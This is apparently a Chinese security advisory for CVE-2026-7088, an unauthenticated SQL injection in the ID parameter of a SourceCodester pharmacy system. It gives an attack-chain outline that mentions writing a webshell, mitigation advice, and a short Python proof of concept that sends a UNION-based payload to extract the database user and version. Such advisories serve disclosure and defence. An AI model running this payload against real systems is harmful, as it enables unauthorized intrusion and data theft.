CVE-2026-7088 CVSS 7.3 高危

CVE-2026-7088 SourceCodester药房系统SQL注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7088

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Sales and Inventory System

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本中的/ajax.php?action=save_receiving文件存在SQL注入漏洞。由于未对参数ID进行充分过滤，远程攻击者无需认证即可通过构造恶意请求执行SQL语句，可能导致敏感信息泄露、数据篡改或服务中断。目前该漏洞利用代码已公开，建议尽快修复。

技术细节

该漏洞位于SourceCodester药房销售与库存管理系统的/ajax.php处理逻辑中。当系统处理save_receiving操作时，直接从用户请求中获取ID参数，并将其拼接到SQL查询语句中，未进行任何有效的输入验证或参数化查询处理。攻击者可以通过发送包含特定SQL元字符（如单引号、注释符）的恶意请求，欺骗后端数据库执行非预期的SQL命令。由于漏洞无需用户交互且无需身份认证（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U），攻击者可轻易远程发起攻击。利用成功后，攻击者可读取数据库中的敏感信息（如管理员密码、客户信息），修改库存数据，甚至在特定环境下获取服务器权限，对系统的机密性、完整性和可用性造成严重威胁。

攻击链分析

STEP 1

信息收集

攻击者通过端口扫描或网络测绘发现目标系统运行SourceCodester Pharmacy Sales and Inventory System 1.0。

STEP 2

漏洞探测

攻击者向/ajax.php?action=save_receiving端点发送包含SQL注入测试字符（如单引号）的请求，观察服务器响应以确认漏洞存在。

STEP 3

漏洞利用

攻击者构造恶意的SQL语句（如UNION SELECT查询）通过ID参数提交，执行数据库查询以提取敏感数据（如管理员账户、用户信息）。

STEP 4

权限提升与持久化

利用获取的数据登录系统后台，或在特定数据库配置下尝试写入WebShell，进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-host/ajax.php"

# Malicious payload to test SQL injection on the 'ID' parameter
# Attempts to extract database version using a UNION-based injection
payload = {
    "action": "save_receiving",
    "ID": "1' UNION SELECT 1, user(), database(), version()-- -"
}

try:
    # Send the GET request with the malicious payload
    response = requests.get(target_url, params=payload, timeout=10)

    # Check the response status
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

在未获得官方补丁前，建议限制对/ajax.php文件的公网访问权限，仅允许受信任的内网IP调用。同时，应在WAF设备上配置规则，严格过滤ID参数中的单引号、双引号、注释符（#、--）等特殊字符，并对数据库用户的读写权限进行最小化配置，防止数据被恶意删除或导出。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7088
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7088
3 Details https://www.cvedetails.com/cve/CVE-2026-7088/
4 VulDB https://vuldb.com/cve/CVE-2026-7088
5 Link https://github.com/nidieaaa/test/issues/3
6 Link https://vuldb.com/submit/800062
7 Link https://vuldb.com/vuln/359663
8 Link https://vuldb.com/vuln/359663/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表